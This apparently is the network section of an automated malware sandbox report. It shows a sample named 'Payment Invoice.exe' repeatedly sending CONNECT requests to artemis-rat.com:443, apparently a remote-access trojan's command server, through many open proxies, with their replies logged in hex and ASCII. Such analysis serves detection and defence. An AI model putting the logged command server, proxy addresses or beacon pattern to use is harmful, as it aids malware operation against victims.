                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 32 20 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 72 6f 78 79 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 72 65 63 65 69 76 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 0d 0a 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 61 6e 20 75 70 73 74 72 65 61 6d 20 73 65 72 76 65 72 2e 3c 62 72 20 2f 3e 0d 0a 54 68 65 20 70 72 6f 78 79 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 3c 70 3e 52 65 61 73 6f 6e 3a 20 3c 73 74 72 6f 6e 67 3e 45 72 72 6f 72 20 72 65 61 64 69 6e 67 20 66 72 6f 6d 20 72 65 6d 6f 74 65 20 73 65 72 76 65 72 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 70 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>502 Proxy Error</title></head><body><h1>Proxy Error</h1><p>The proxy server received an invalidresponse from an upstream server.<br />The proxy server could not handle the request<p>Reason: <strong>Error reading from remote server</strong></p></p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1467192.168.2.452547163.172.153.194163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.092509031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.183156967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.183670044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.277112007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.276727915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1468192.168.2.45443623.137.248.197807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.095663071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1469192.168.2.45450637.235.53.20867897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.100341082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1470192.168.2.454149202.166.219.8041537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.106232882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1471192.168.2.45449194.45.74.6080807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.108483076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1472192.168.2.454595104.18.234.218807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.117206097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.271385908 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1473192.168.2.45375745.140.189.95290037076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.118596077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.123651981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.214734077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.324322939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.323843002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1474192.168.2.454634172.67.206.105807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.140302896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.294518948 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1475192.168.2.45370539.105.27.3031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.140491009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.474265099 CET767INHTTP/1.1 403 Forbidden
                                                                Server: Beaver
                                                                Cache-Control: no-cache
                                                                Content-Type: text/html
                                                                Content-Length: 635
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1476192.168.2.453664159.223.71.71603777076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.140755892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.183290005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.183670044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.277112961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.276793957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:57.292531967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:09.386543989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:33.386152029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1477192.168.2.454375103.118.44.13680807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.140964031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1478192.168.2.454445103.127.1.130807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.146754026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.535670042 CET343INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 182
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1479192.168.2.454404203.112.134.7456787076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.148375988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1480192.168.2.45459451.75.126.15042287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.150752068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1481192.168.2.454535184.185.2.1241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.151107073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1482192.168.2.453691203.19.38.11410807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.156369925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.654220104 CET309INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.22.0
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 157
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1483192.168.2.454393175.183.82.22181977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.160968065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1484192.168.2.45460035.185.196.3831287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.162149906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.375938892 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1485192.168.2.453628202.150.151.13849957076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.174086094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.303698063 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1486192.168.2.44974045.11.95.16552127076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.174766064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.327179909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1487192.168.2.45452545.120.178.19710807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.175626993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1488192.168.2.454278103.153.154.6807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.178323984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.670784950 CET343INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 182
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
